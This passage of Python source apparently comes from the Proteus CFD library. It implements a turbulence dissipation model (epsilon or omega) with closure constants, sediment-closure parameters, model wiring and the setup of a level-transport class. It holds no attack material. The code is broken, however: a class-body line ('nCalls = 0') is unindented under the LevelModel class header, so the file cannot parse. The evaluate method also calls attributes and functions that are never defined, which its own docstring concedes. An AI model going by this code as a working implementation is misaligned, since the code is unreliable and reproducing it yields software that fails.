        for ci in range(self.nc):
            self.numDiff.append(cq[('numDiff', ci, ci)])
            self.numDiff_last.append(cq[('numDiff', ci, ci)])
    def updateShockCapturingHistory(self):
        self.nSteps += 1
        if self.lag:
            # Copy the freshly computed diffusion into the lagged arrays.
            for ci in range(self.nc):
                self.numDiff_last[ci][:] = self.numDiff[ci]
        if not self.lag and self.nStepsToDelay is not None and self.nSteps > self.nStepsToDelay:
            # Delay has elapsed: turn lagging on and take an independent
            # copy of the current diffusion as the lagged state.
            prof.logEvent("Dissipation.ShockCapturing: switched to lagged shock capturing")
            self.lag = True
            self.numDiff_last = []
            for ci in range(self.nc):
                self.numDiff_last.append(self.numDiff[ci].copy())
        prof.logEvent("Dissipation: max numDiff %e" % (proteus.Comm.globalMax(self.numDiff_last[0].max()),))
class NumericalFlux(proteus.NumericalFlux.Advection_DiagonalUpwind_Diffusion_IIPG_exterior):
    """Thin wrapper selecting the IIPG exterior advection/diffusion flux."""
    def __init__(self, vt, getPointwiseBoundaryConditions,
                 getAdvectiveFluxBoundaryConditions,
                 getDiffusiveFluxBoundaryConditions):
        proteus.NumericalFlux.Advection_DiagonalUpwind_Diffusion_IIPG_exterior.__init__(self, vt, getPointwiseBoundaryConditions,
                                                                                        getAdvectiveFluxBoundaryConditions,
                                                                                        getDiffusiveFluxBoundaryConditions)
class Coefficients(proteus.TransportCoefficients.TC_base):
    """Basic k-epsilon model for incompressible flow from Hutter etal
    Chapter 11 or k-omega (Wilcox 1998).

    Solves for the dissipation variable only (epsilon for k-epsilon,
    omega for k-omega); the turbulent intensity kappa is computed by a
    separate model and lagged in time.
    """
    # Solves for just dissipation variable (epsilon, or omega) assuming
    # kappa (intensity) computed independently and lagged in time
    # \bar{\vec v} = <\vec v> Reynolds-averaged (mean) velocity
    # \vec v^{'}   = turbulent fluctuation
    # assume \vec v = <\vec v> + \vec v^{'}, with <\vec v^{'}> = 0
    # Reynolds averaged NS equations
    # \deld \bar{\vec v} = 0
    # \pd{\bar{\vec v}}{t} + \deld \left(\bar{\vec v} \outer \bar{\vec v}\right)
    #                -\nu \deld \ten \bar{D} + \frac{1}{\rho}\grad \bar p
    #                - \frac{1}{rho}\deld \ten{R} = 0
    # Reynolds stress term
    # \ten R = -\rho <\vec v^{'}\outer \vec v^{'}>
    # \frac{1}{\rho}\ten{R} = 2 \nu_t \bar{D} - \frac{2}{3}k\ten{I}
    # D_{ij}(\vec v) = \frac{1}{2} \left( \pd{v_i}{x_j} + \pd{v_j}{x_i})
    # \ten D \bar{\ten D} = D(<\vec v>), \ten D^{'} = \ten D(\vec v^{'})
    # k-epsilon tranport equations
    # \pd{k}{t} + \deld (k\bar{\vec v})
    #          - \deld\left[\left(\frac{\nu_t}{\sigma_k} + \nu\right)\grad k \right]
    #          - 4\nu_t \Pi_{D} + \epsilon = 0
    # \pd{\varepsilon}{t} + \deld (\varepsilon \bar{\vec v})
    #          - \deld\left[\left(\frac{\nu_t}{\sigma_\varepsilon} + \nu\right)\grad \varepsilon \right]
    #          - 4c_1 k \Pi_{D} + c_2 \frac{\epsilon^2}{k} = 0
    # k              -- turbulent kinetic energy = <\vec v^{'}\dot \vec v^{'}>
    # \varepsilon    -- turbulent dissipation rate = 4 \nu <\Pi_{D^{'}}>
    # \nu            -- kinematic viscosity (\mu/\rho)
    # \nu_t          -- turbulent viscosity = c_mu \frac{k^2}{\varepsilon}
    # \Pi_{\ten A} = \frac{1}{2}tr(\ten A^2) = 1/2 \ten A\cdot \ten A
    # \ten D \cdot \ten D = \frac{1}{4}\left[ (4 u_x^2 + 4 v_y^2 +
    #                                         1/2 (u_y + v_x)^2 \right]
    # 4 \Pi_{D} = 2 \frac{1}{4}\left[ (4 u_x^2 + 4 v_y^2 +
    #                                 1/2 (u_y + v_x)^2 \right]
    #           = \left[ (2 u_x^2 + 2 v_y^2 + (u_y + v_x)^2 \right]
    # \sigma_k -- Prandtl number \approx 1
    # \sigma_e -- c_{\mu}/c_e
    # c_{\mu} = 0.09, c_1 = 0.126, c_2 = 1.92, c_{\varepsilon} = 0.07
    # """
    from proteus.ctransportCoefficients import kEpsilon_k_3D_Evaluate_sd
    from proteus.ctransportCoefficients import kEpsilon_k_2D_Evaluate_sd

    def __init__(self,
                 VOS_model=None,  # Solid model
                 V_model=None,  # Fluid model
                 LS_model=None,
                 RD_model=None,
                 kappa_model=None,
                 ME_model=None,
                 SED_model=None,
                 dissipation_model_flag=1,  # default K-Epsilon, 2 --> K-Omega 1998, 3 --> K-Omega 1988
                 c_mu=0.09,
                 c_1=0.126,
                 c_2=1.92,
                 c_e=0.07,
                 sigma_e=1.29,
                 rho_0=998.2,
                 nu_0=1.004e-6,
                 rho_1=1.205,
                 nu_1=1.500e-5,
                 g=[0.0, -9.8],
                 nd=3,
                 epsFact=0.01,
                 useMetrics=0.0,
                 sc_uref=1.0,
                 sc_beta=1.0,
                 default_kappa=1.0e-3,
                 closure=None,
                 nullSpace='NoNullSpace',
                 initialize=True):
        """Store model indices, fluid properties and closure constants.

        The *\*_model* arguments are indices into the multi-model list
        passed later to :meth:`attachModels`; ``ME_model`` is this model's
        own index.
        """
        self.useMetrics = useMetrics
        self.dissipation_model_flag = dissipation_model_flag  # default K-Epsilon, 2 ==> K-Omega 1998, 3 --> K-Omega 1988
        self.variableNames = ['epsilon']
        self.nd = nd
        self.rho_0 = rho_0
        self.nu_0 = nu_0
        self.rho_1 = rho_1
        self.rho = rho_0
        self.nu_1 = nu_1
        self.c_mu = c_mu
        self.c_1 = c_1
        self.c_2 = c_2
        self.c_e = c_e
        self.sigma_e = sigma_e
        self.g = g
        self.epsFact = epsFact
        self.flowModelIndex = V_model
        self.modelIndex = ME_model
        self.RD_modelIndex = RD_model
        self.LS_modelIndex = LS_model
        self.VOS_modelIndex = VOS_model
        self.SED_modelIndex = SED_model
        self.kappa_modelIndex = kappa_model
        self.sc_uref = sc_uref
        self.sc_beta = sc_beta
        self.nullSpace = nullSpace
        # for debugging model
        self.default_kappa = default_kappa
        self.closure = closure
        if initialize:
            self.initialize()

    def initialize(self):
        """Set up the TC_base coefficient structure and sediment closure."""
        if self.dissipation_model_flag >= 2:
            # K-Omega variants solve for omega rather than epsilon.
            self.variableNames = ['omega']
        #
        nc = 1
        mass = {0: {0: 'linear'}}
        advection = {0: {0: 'linear'}}
        hamiltonian = {}
        potential = {0: {0: 'u'}}
        diffusion = {0: {0: {0: 'nonlinear', }}}
        reaction = {0: {0: 'nonlinear'}}
        if self.nd == 2:
            sdInfo = {(0, 0): (np.array([0, 1, 2], dtype='i'),
                               np.array([0, 1], dtype='i'))}
        else:
            sdInfo = {(0, 0): (np.array([0, 1, 2, 3], dtype='i'),
                               np.array([0, 1, 2], dtype='i'))}
        proteus.TransportCoefficients.TC_base.__init__(self,
                                                       nc,
                                                       mass,
                                                       advection,
                                                       diffusion,
                                                       potential,
                                                       reaction,
                                                       hamiltonian,
                                                       self.variableNames,
                                                       sparseDiffusionTensors=sdInfo)
        closure = self.closure
        # Copy sediment closure parameters if a closure object was given;
        # otherwise fall back to dummy values and disable the sediment terms.
        try:
            self.aDarcy = closure.aDarcy
            self.betaForch = closure.betaForch
            self.grain = closure.grain
            self.packFraction = closure.packFraction
            self.packMargin = closure.packMargin
            self.maxFraction = closure.maxFraction
            self.frFraction = closure.frFraction
            self.sigmaC = closure.sigmaC
            self.C3e = closure.C3e
            self.C4e = closure.C4e
            self.eR = closure.eR
            self.fContact = closure.fContact
            self.mContact = closure.mContact
            self.nContact = closure.nContact
            self.angFriction = closure.angFriction
            self.vos_limiter = closure.vos_limiter
            self.mu_fr_limiter = closure.mu_fr_limiter
            self.sedFlag = 1
            prof.logEvent("INFO: Loading parameters for sediment closure", 2)
        except AttributeError:
            # Narrowed from a bare except: closure is None or incomplete.
            self.aDarcy = -1.
            self.betaForch = -1.
            self.grain = -1.
            self.packFraction = -1.
            self.packMargin = -1.
            self.maxFraction = -1.
            self.frFraction = -1.
            self.sigmaC = -1.
            self.C3e = -1.
            self.C4e = -1.
            self.eR = -1.
            self.fContact = -1.
            self.mContact = -1.
            self.nContact = -1.
            self.angFriction = -1.
            self.vos_limiter = -1.
            self.mu_fr_limiter = -1.
            self.sedFlag = 0
            assert self.VOS_modelIndex is None
            assert self.SED_modelIndex is None
            prof.logEvent("Sediment module is off. Loading dummy parameters", 2)

    def initializeMesh(self, mesh):
        # Interface smearing width scales with the mesh size.
        self.eps = self.epsFact * mesh.h

    def attachModels(self, modelList):
        """Wire up references to the companion models' quadrature arrays."""
        assert self.modelIndex is not None and self.modelIndex < len(
            modelList), "Dissipation: invalid index for self model allowed range: [0,%s]" % len(modelList)
        # self
        self.model = modelList[self.modelIndex]
        # redistanced level set
        if self.RD_modelIndex is not None:
            self.rdModel = modelList[self.RD_modelIndex]
        # level set
        if self.LS_modelIndex is not None:
            self.lsModel = modelList[self.LS_modelIndex]
            self.q_phi = modelList[self.LS_modelIndex].q[('u', 0)]
            self.ebqe_phi = modelList[self.LS_modelIndex].ebqe[('u', 0)]
            if ('u', 0) in modelList[self.LS_modelIndex].ebq:
                self.ebq_phi = modelList[self.LS_modelIndex].ebq[('u', 0)]
            else:
                self.ebq_phi = None
        else:
            # No level set model: use a constant negative phi (all "water").
            self.q_phi = -np.ones(modelList[self.kappa_modelIndex].q[('u', 0)].shape, 'd')
            #self.ebq_phi =-np.ones( modelList[self.dissipation_modelIndex].ebq[('u', 0)].shape, 'd')
            self.ebqe_phi = -np.ones(modelList[self.kappa_modelIndex].ebqe[('u', 0)].shape, 'd')
        # flow model
        self.u_old_dof = np.copy(self.model.u[0].dof)
        assert self.flowModelIndex is not None, "Dissipation: invalid index for flow model allowed range: [0,%s]" % len(modelList)
        # print "flow model index------------",self.flowModelIndex,modelList[self.flowModelIndex].q.has_key(('velocity',0))
        if self.flowModelIndex is not None:  # keep for debugging for now
            self.model.ebqe['n'][:] = modelList[self.flowModelIndex].ebqe['n']
            # Prefer the post-processed velocity; fall back to the advective
            # flux ('f', 0) when it is not available.
            if ('velocity', 0) in modelList[self.flowModelIndex].q:
                self.q_v = modelList[self.flowModelIndex].q[('velocity', 0)]
                self.ebqe_v = modelList[self.flowModelIndex].ebqe[('velocity', 0)]
            else:
                self.q_v = modelList[self.flowModelIndex].q[('f', 0)]
                self.ebqe_v = modelList[self.flowModelIndex].ebqe[('f', 0)]
            if ('velocity', 0) in modelList[self.flowModelIndex].ebq:
                self.ebq_v = modelList[self.flowModelIndex].ebq[('velocity', 0)]
            else:
                if ('f', 0) in modelList[self.flowModelIndex].ebq:
                    self.ebq_v = modelList[self.flowModelIndex].ebq[('f', 0)]
            #
            import copy
            self.q_grad_u = modelList[self.flowModelIndex].q[('grad(u)', 1)]
            self.q_grad_v = modelList[self.flowModelIndex].q[('grad(u)', 2)]
            #
            self.ebqe_grad_u = modelList[self.flowModelIndex].ebqe[('grad(u)', 1)]
            self.ebqe_grad_v = modelList[self.flowModelIndex].ebqe[('grad(u)', 2)]
            if ('grad(u)', 1) in modelList[self.flowModelIndex].ebq:
                self.ebq_grad_u = modelList[self.flowModelIndex].ebq[('grad(u)', 1)]
            if ('grad(u)', 2) in modelList[self.flowModelIndex].ebq:
                self.ebq_grad_v = modelList[self.flowModelIndex].ebq[('grad(u)', 2)]
            #
            # now allocate the 3D variables
            if self.nd == 2:
                # In 2D the w-component arrays are placeholders copied from v.
                self.q_grad_w = self.q_grad_v.copy()
                self.ebqe_grad_w = self.ebqe_grad_v.copy()
                if ('grad(u)', 2) in modelList[self.flowModelIndex].ebq:
                    self.ebq_grad_w = self.ebq_grad_v.copy()
            else:
                self.q_grad_w = modelList[self.flowModelIndex].q[('grad(u)', 3)]
                self.ebqe_grad_w = modelList[self.flowModelIndex].ebqe[('grad(u)', 3)]
                if ('grad(u)', 3) in modelList[self.flowModelIndex].ebq:
                    self.ebq_grad_w = modelList[self.flowModelIndex].ebq[('grad(u)', 3)]
            #
            self.velocity_dof_u = modelList[self.flowModelIndex].u[1].dof
            self.velocity_dof_v = modelList[self.flowModelIndex].u[2].dof
            if self.nd == 2:
                self.velocity_dof_w = self.velocity_dof_v.copy()
            else:
                self.velocity_dof_w = modelList[self.flowModelIndex].u[3].dof
            if hasattr(modelList[self.flowModelIndex].coefficients, 'q_porosity'):
                self.q_porosity = modelList[self.flowModelIndex].coefficients.q_porosity
            else:
                self.q_porosity = np.ones(self.q[('u', 0)].shape, 'd')
            if hasattr(modelList[self.flowModelIndex].coefficients, 'ebqe_porosity'):
                self.ebqe_porosity = modelList[self.flowModelIndex].coefficients.ebqe_porosity
            else:
                self.ebqe_porosity = np.ones(modelList[self.flowModelIndex].ebqe[('velocity', 0)].shape, 'd')
        else:
            self.velocity_dof_u = np.zeros(self.model.u[0].dof.shape, 'd')
            self.velocity_dof_v = np.zeros(self.model.u[0].dof.shape, 'd')
            if self.nd == 2:
                self.velocity_dof_w = self.velocity_dof_v.copy()
            else:
                self.velocity_dof_w = np.zeros(self.model.u[0].dof.shape, 'd')
            self.q_porosity = np.ones(self.q[('u', 0)].shape, 'd')
            self.ebqe_porosity = np.ones(self.ebqe[('u', 0)].shape, 'd')
        #
        #assert self.kappa_modelIndex is not None and self.kappa_modelIndex < len(modelList), "Dissipation: invalid index for dissipation model allowed range: [0,%s]" % len(modelList)
        if self.kappa_modelIndex is not None:  # keep for debugging for now
            # assume have q,ebqe always
            self.q_kappa = modelList[self.kappa_modelIndex].q[('u', 0)]
            self.ebqe_kappa = modelList[self.kappa_modelIndex].ebqe[('u', 0)]
            self.q_grad_kappa = modelList[self.kappa_modelIndex].q[('grad(u)', 0)]
            if ('u', 0) in modelList[self.kappa_modelIndex].ebq:
                self.ebq_kappa = modelList[self.kappa_modelIndex].ebq[('u', 0)]
        else:
            # No kappa model: fall back to the constant default_kappa.
            self.q_kappa = np.zeros(self.model.q[('u', 0)].shape, 'd')
            self.q_kappa.fill(self.default_kappa)
            self.ebqe_kappa = np.zeros(self.model.ebqe[('u', 0)].shape, 'd')
            self.ebqe_kappa.fill(self.default_kappa)
            self.q_grad_kappa = np.zeros(self.model.q[('grad(u)', 0)].shape, 'd')
            if ('u', 0) in self.model.ebq:
                self.ebq_kappa = np.zeros(self.model.ebq[('u', 0)].shape, 'd')
                self.ebq_kappa.fill(self.default_kappa)
        #
        if self.VOS_modelIndex is not None:
            # Fixed: was `model[self.VOS_modelIndex]` (undefined name).
            self.vosModel = modelList[self.VOS_modelIndex]
            self.q_vos = modelList[self.VOS_modelIndex].q[('u', 0)]
            self.grad_vos = modelList[self.VOS_modelIndex].q[('grad(u)', 0)]
            self.ebqe_vos = modelList[self.VOS_modelIndex].ebqe[('u', 0)]
            self.ebqe_grad_vos = modelList[self.VOS_modelIndex].ebqe[('grad(u)', 0)]
        else:
            self.q_vos = self.model.q[('u', 0)]
            self.grad_vos = self.model.q[('u', 0)]
            self.ebqe_vos = self.model.ebqe[('u', 0)]
            self.ebqe_grad_vos = self.model.ebqe[('u', 0)]
        if self.SED_modelIndex is not None:
            self.rho_s = modelList[self.SED_modelIndex].coefficients.rho_s
            self.vs = modelList[self.SED_modelIndex].q[('u', 0)]
            self.ebqe_vs = modelList[self.SED_modelIndex].ebqe[('u', 0)]
        else:
            # No sediment model: reuse fluid density and velocity.
            self.rho_s = self.rho_0
            self.vs = self.q_v
            self.ebqe_vs = self.ebqe_v
        #

    def initializeElementQuadrature(self, t, cq):
        # Provide dummy arrays when companion models are absent.
        if self.flowModelIndex is None:
            self.q_v = np.ones(cq[('f', 0)].shape, 'd')
            self.q_grad_u = np.ones(cq[('grad(u)', 0)].shape, 'd')
            self.q_grad_v = np.ones(cq[('grad(u)', 0)].shape, 'd')
            if self.nd == 2:
                self.q_grad_w = self.q_grad_v.copy()
            else:
                self.q_grad_w = np.ones(cq[('grad(u)', 0)].shape, 'd')
        if self.kappa_modelIndex is None:
            self.q_kappa = np.ones(cq[('u', 0)].shape, 'd')
            self.q_kappa.fill(self.default_kappa)
            self.q_grad_kappa = np.zeros(cq[('grad(u)', 0)].shape, 'd')

    def initializeElementBoundaryQuadrature(self, t, cebq, cebq_global):
        # Dummy interior-boundary arrays when companion models are absent.
        if self.flowModelIndex is None:
            self.ebq_v = np.ones(cebq[('f', 0)].shape, 'd')
            self.ebq_grad_u = np.ones(cebq[('grad(u)', 0)].shape, 'd')
            self.ebq_grad_v = np.ones(cebq[('grad(u)', 0)].shape, 'd')
            if self.nd == 2:
                self.ebq_grad_w = self.ebq_grad_v.copy()
            else:
                self.ebq_grad_w = np.ones(cebq[('grad(u)', 0)].shape, 'd')
        if self.kappa_modelIndex is None:
            self.ebq_kappa = np.ones(cebq[('u', 0)].shape, 'd')
            self.ebq_kappa.fill(self.default_kappa)

    def initializeGlobalExteriorElementBoundaryQuadrature(self, t, cebqe):
        # Dummy exterior-boundary arrays when companion models are absent.
        if self.flowModelIndex is None:
            self.ebqe_v = np.ones(cebqe[('f', 0)].shape, 'd')
            self.ebqe_grad_u = np.ones(cebqe[('grad(u)', 0)].shape, 'd')
            self.ebqe_grad_v = np.ones(cebqe[('grad(u)', 0)].shape, 'd')
            self.ebqe_grad_w = np.ones(cebqe[('grad(u)', 0)].shape, 'd')
        if self.kappa_modelIndex is None:
            self.ebqe_kappa = np.ones(cebqe[('u', 0)].shape, 'd')
            self.ebqe_kappa.fill(self.default_kappa)

    def preStep(self, t, firstStep=False):
        copyInstructions = {}
        return copyInstructions

    def postStep(self, t, firstStep=False):
        """Save old dof and clip the dissipation variable away from zero."""
        self.u_old_dof = np.copy(self.model.u[0].dof)
        # Enforce positivity (epsilon/omega must stay > 0). Vectorized
        # equivalent of the original elementwise max loops.
        np.maximum(self.model.q[('u', 0)], 1.0e-10, out=self.model.q[('u', 0)])
        if ('u', 0) in self.model.ebq:
            np.maximum(self.model.ebq[('u', 0)], 1.0e-10, out=self.model.ebq[('u', 0)])
        np.maximum(self.model.ebqe[('u', 0)], 1.0e-10, out=self.model.ebqe[('u', 0)])
        copyInstructions = {}
        return copyInstructions

    def updateToMovingDomain(self, t, c):
        # in a moving domain simulation the velocity coming in is already for the moving domain
        pass

    def evaluate(self, t, c):
        """Evaluate the coefficients at the quadrature dictionary ``c``.

        The quadrature family (element / exterior boundary / interior
        boundary) is selected by matching the shape of ``c[('f', 0)]``
        against the stored velocity arrays.

        NOTE(review): this path appears to be legacy -- ``self.nu`` and
        ``self.kEpsilon_epsilon_{2,3}D_Evaluate_sd`` are not defined on
        this class (only the kappa evaluators are imported above), so the
        calls below would still fail if ever reached. The local-name
        mismatches (velocity/gradu/gradv/gradw vs the variables actually
        bound here) and the unbound ``kappa`` fall-through have been
        fixed regardless.
        """
        if c[('f', 0)].shape == self.q_v.shape:
            v = self.q_v
            phi = self.q_phi
            grad_u = self.q_grad_u
            grad_v = self.q_grad_v
            grad_w = self.q_grad_w
            kappa = self.q_kappa
        elif c[('f', 0)].shape == self.ebqe_v.shape:
            v = self.ebqe_v
            phi = self.ebqe_phi
            grad_u = self.ebqe_grad_u
            grad_v = self.ebqe_grad_v
            grad_w = self.ebqe_grad_w
            kappa = self.ebqe_kappa
        elif ((self.ebq_v is not None and self.ebq_phi is not None and self.ebq_grad_u is not None and self.ebq_grad_v is not None and self.ebq_grad_w is not None and self.ebq_kappa is not None) and c[('f', 0)].shape == self.ebq_v.shape):
            v = self.ebq_v
            phi = self.ebq_phi
            grad_u = self.ebq_grad_u
            grad_v = self.ebq_grad_v
            # Fixed: previously used self.ebqe_grad_w in the ebq branch.
            grad_w = self.ebq_grad_w
            kappa = self.ebq_kappa
        else:
            v = None
            phi = None
            grad_u = None
            grad_v = None
            grad_w = None
            # Fixed: kappa was left unbound in this branch.
            kappa = None
        if v is not None:
            if self.nd == 2:
                self.kEpsilon_epsilon_2D_Evaluate_sd(self.sigma_e,
                                                     self.c_1,
                                                     self.c_2,
                                                     self.c_mu,
                                                     self.c_e,
                                                     self.nu,
                                                     v,
                                                     grad_u,
                                                     grad_v,
                                                     c[('u', 0)],
                                                     kappa,
                                                     c[('m', 0)],
                                                     c[('dm', 0, 0)],
                                                     c[('f', 0)],
                                                     c[('df', 0, 0)],
                                                     c[('a', 0, 0)],
                                                     c[('da', 0, 0, 0)],
                                                     c[('r', 0)],
                                                     c[('dr', 0, 0)])
            else:
                self.kEpsilon_epsilon_3D_Evaluate_sd(self.sigma_e,
                                                     self.c_1,
                                                     self.c_2,
                                                     self.c_mu,
                                                     self.c_e,
                                                     self.nu,
                                                     v,
                                                     grad_u,
                                                     grad_v,
                                                     grad_w,
                                                     c[('u', 0)],
                                                     kappa,
                                                     c[('m', 0)],
                                                     c[('dm', 0, 0)],
                                                     c[('f', 0)],
                                                     c[('df', 0, 0)],
                                                     c[('a', 0, 0)],
                                                     c[('da', 0, 0, 0)],
                                                     c[('r', 0)],
                                                     c[('dr', 0, 0)])
class LevelModel(proteus.Transport.OneLevelTransport):
nCalls = 0
    def __init__(self,
                 uDict,
                 phiDict,
                 testSpaceDict,
                 matType,
                 dofBoundaryConditionsDict,
                 dofBoundaryConditionsSetterDict,
                 coefficients,
                 elementQuadrature,
                 elementBoundaryQuadrature,
                 fluxBoundaryConditionsDict=None,
                 advectiveFluxBoundaryConditionsSetterDict=None,
                 diffusiveFluxBoundaryConditionsSetterDictDict=None,
                 stressTraceBoundaryConditionsSetterDict=None,
                 stabilization=None,
                 shockCapturing=None,
                 conservativeFluxDict=None,
                 numericalFluxType=None,
                 TimeIntegrationClass=None,
                 massLumping=False,
                 reactionLumping=False,
                 options=None,
                 name='defaultName',
                 reuse_trial_and_test_quadrature=True,
                 sd = True,
                 movingDomain=False,
                 bdyNullSpace=False):
        """Set up the one-level spatial discretization for the Dissipation model.

        Stores the FEM spaces, boundary-condition and coefficient objects,
        builds the union quadrature rules, allocates the ``q``/``ebqe``
        storage read by the C residual/Jacobian kernels, constructs the time
        integration and numerical flux objects, and instantiates the 2D or 3D
        ``cDissipation`` kernel wrapper.  The parameter list mirrors
        ``proteus.Transport.OneLevelTransport.__init__``.
        """
        #
        # set the objects describing the method and boundary conditions
        #
        self.bdyNullSpace=bdyNullSpace
        self.movingDomain=movingDomain
        self.tLast_mesh=None
        #
        self.name = name
        self.sd = sd
        self.Hess = False
        self.lowmem = True
        self.timeTerm = True  # allow turning off the time derivative
        # self.lowmem=False
        self.testIsTrial = True
        self.phiTrialIsTrial = True
        self.u = uDict
        self.ua = {}  # analytical solutions
        self.phi = phiDict
        self.dphi = {}
        self.matType = matType
        # try to reuse test and trial information across components if spaces are the same
        self.reuse_test_trial_quadrature = reuse_trial_and_test_quadrature  # True#False
        if self.reuse_test_trial_quadrature:
            for ci in range(1, coefficients.nc):
                assert self.u[ci].femSpace.__class__.__name__ == self.u[0].femSpace.__class__.__name__, "to reuse_test_trial_quad all femSpaces must be the same!"
        # Simplicial Mesh
        self.mesh = self.u[0].femSpace.mesh  # assume the same mesh for all components for now
        self.testSpace = testSpaceDict
        self.dirichletConditions = dofBoundaryConditionsDict
        self.dirichletNodeSetList = None  # explicit Dirichlet conditions for now, no Dirichlet BC constraints
        self.coefficients = coefficients
        self.coefficients.initializeMesh(self.mesh)
        self.nc = self.coefficients.nc
        self.stabilization = stabilization
        self.shockCapturing = shockCapturing
        self.conservativeFlux = conservativeFluxDict  # no velocity post-processing for now
        self.fluxBoundaryConditions = fluxBoundaryConditionsDict
        self.advectiveFluxBoundaryConditionsSetterDict = advectiveFluxBoundaryConditionsSetterDict
        self.diffusiveFluxBoundaryConditionsSetterDictDict = diffusiveFluxBoundaryConditionsSetterDictDict
        # determine whether the stabilization term is nonlinear
        # (nonlinear if any mass/advection/potential/reaction/hamiltonian flag
        # is 'nonlinear', or any diffusion flag is not 'constant')
        self.stabilizationIsNonlinear = False
        # cek come back
        if self.stabilization is not None:
            for ci in range(self.nc):
                if ci in coefficients.mass:
                    for flag in list(coefficients.mass[ci].values()):
                        if flag == 'nonlinear':
                            self.stabilizationIsNonlinear = True
                if ci in coefficients.advection:
                    for flag in list(coefficients.advection[ci].values()):
                        if flag == 'nonlinear':
                            self.stabilizationIsNonlinear = True
                if ci in coefficients.diffusion:
                    for diffusionDict in list(coefficients.diffusion[ci].values()):
                        for flag in list(diffusionDict.values()):
                            if flag != 'constant':
                                self.stabilizationIsNonlinear = True
                if ci in coefficients.potential:
                    for flag in list(coefficients.potential[ci].values()):
                        if flag == 'nonlinear':
                            self.stabilizationIsNonlinear = True
                if ci in coefficients.reaction:
                    for flag in list(coefficients.reaction[ci].values()):
                        if flag == 'nonlinear':
                            self.stabilizationIsNonlinear = True
                if ci in coefficients.hamiltonian:
                    for flag in list(coefficients.hamiltonian[ci].values()):
                        if flag == 'nonlinear':
                            self.stabilizationIsNonlinear = True
        # determine if we need element boundary storage
        self.elementBoundaryIntegrals = {}
        for ci in range(self.nc):
            self.elementBoundaryIntegrals[ci] = ((self.conservativeFlux is not None) or
                                                 (numericalFluxType is not None) or
                                                 (self.fluxBoundaryConditions[ci] == 'outFlow') or
                                                 (self.fluxBoundaryConditions[ci] == 'mixedFlow') or
                                                 (self.fluxBoundaryConditions[ci] == 'setFlow'))
        #
        # calculate some dimensions
        #
        self.nSpace_global = self.u[0].femSpace.nSpace_global  # assume same space dim for all variables
        self.nDOF_trial_element = [u_j.femSpace.max_nDOF_element for u_j in list(self.u.values())]
        self.nDOF_phi_trial_element = [phi_k.femSpace.max_nDOF_element for phi_k in list(self.phi.values())]
        self.n_phi_ip_element = [phi_k.femSpace.referenceFiniteElement.interpolationConditions.nQuadraturePoints for phi_k in list(self.phi.values())]
        self.nDOF_test_element = [femSpace.max_nDOF_element for femSpace in list(self.testSpace.values())]
        self.nFreeDOF_global = [dc.nFreeDOF_global for dc in list(self.dirichletConditions.values())]
        self.nVDOF_element = sum(self.nDOF_trial_element)
        self.nFreeVDOF_global = sum(self.nFreeDOF_global)
        #
        proteus.NonlinearSolvers.NonlinearEquation.__init__(self, self.nFreeVDOF_global)
        #
        # build the quadrature point dictionaries from the input (this
        # is just for convenience so that the input doesn't have to be
        # complete)
        #
        elementQuadratureDict = {}
        elemQuadIsDict = isinstance(elementQuadrature, dict)
        if elemQuadIsDict:  # set terms manually
            for I in self.coefficients.elementIntegralKeys:
                if I in elementQuadrature:
                    elementQuadratureDict[I] = elementQuadrature[I]
                else:
                    elementQuadratureDict[I] = elementQuadrature['default']
        else:
            for I in self.coefficients.elementIntegralKeys:
                elementQuadratureDict[I] = elementQuadrature
        if self.stabilization is not None:
            for I in self.coefficients.elementIntegralKeys:
                if elemQuadIsDict:
                    if I in elementQuadrature:
                        elementQuadratureDict[('stab',) + I[1:]] = elementQuadrature[I]
                    else:
                        elementQuadratureDict[('stab',) + I[1:]] = elementQuadrature['default']
                else:
                    elementQuadratureDict[('stab',) + I[1:]] = elementQuadrature
        if self.shockCapturing is not None:
            for ci in self.shockCapturing.components:
                if elemQuadIsDict:
                    if ('numDiff', ci, ci) in elementQuadrature:
                        elementQuadratureDict[('numDiff', ci, ci)] = elementQuadrature[('numDiff', ci, ci)]
                    else:
                        elementQuadratureDict[('numDiff', ci, ci)] = elementQuadrature['default']
                else:
                    elementQuadratureDict[('numDiff', ci, ci)] = elementQuadrature
        if massLumping:
            # lumped mass: nodal (Lobatto) quadrature for the mass and stabilization terms
            for ci in list(self.coefficients.mass.keys()):
                elementQuadratureDict[('m', ci)] = Quadrature.SimplexLobattoQuadrature(self.nSpace_global, 1)
            for I in self.coefficients.elementIntegralKeys:
                elementQuadratureDict[('stab',) + I[1:]] = Quadrature.SimplexLobattoQuadrature(self.nSpace_global, 1)
        if reactionLumping:
            for ci in list(self.coefficients.mass.keys()):
                elementQuadratureDict[('r', ci)] = Quadrature.SimplexLobattoQuadrature(self.nSpace_global, 1)
            for I in self.coefficients.elementIntegralKeys:
                elementQuadratureDict[('stab',) + I[1:]] = Quadrature.SimplexLobattoQuadrature(self.nSpace_global, 1)
        elementBoundaryQuadratureDict = {}
        if isinstance(elementBoundaryQuadrature, dict):  # set terms manually
            for I in self.coefficients.elementBoundaryIntegralKeys:
                if I in elementBoundaryQuadrature:
                    elementBoundaryQuadratureDict[I] = elementBoundaryQuadrature[I]
                else:
                    elementBoundaryQuadratureDict[I] = elementBoundaryQuadrature['default']
        else:
            for I in self.coefficients.elementBoundaryIntegralKeys:
                elementBoundaryQuadratureDict[I] = elementBoundaryQuadrature
        #
        # find the union of all element quadrature points and
        # build a quadrature rule for each integral that has a
        # weight at each point in the union
        # mwf include tag telling me which indices are which quadrature rule?
        (self.elementQuadraturePoints, self.elementQuadratureWeights,
         self.elementQuadratureRuleIndeces) = proteus.Quadrature.buildUnion(elementQuadratureDict)
        self.nQuadraturePoints_element = self.elementQuadraturePoints.shape[0]
        self.nQuadraturePoints_global = self.nQuadraturePoints_element * self.mesh.nElements_global
        #
        # Repeat the same thing for the element boundary quadrature
        #
        (self.elementBoundaryQuadraturePoints,
         self.elementBoundaryQuadratureWeights,
         self.elementBoundaryQuadratureRuleIndeces) = proteus.Quadrature.buildUnion(elementBoundaryQuadratureDict)
        self.nElementBoundaryQuadraturePoints_elementBoundary = self.elementBoundaryQuadraturePoints.shape[0]
        self.nElementBoundaryQuadraturePoints_global = (self.mesh.nElements_global *
                                                        self.mesh.nElementBoundaries_element *
                                                        self.nElementBoundaryQuadraturePoints_elementBoundary)
        # if isinstance(self.u[0].femSpace,C0_AffineLinearOnSimplexWithNodalBasis):
        #    print self.nQuadraturePoints_element
        #    if self.nSpace_global == 3:
        #        assert(self.nQuadraturePoints_element == 5)
        #    elif self.nSpace_global == 2:
        #        assert(self.nQuadraturePoints_element == 6)
        #    elif self.nSpace_global == 1:
        #        assert(self.nQuadraturePoints_element == 3)
        #
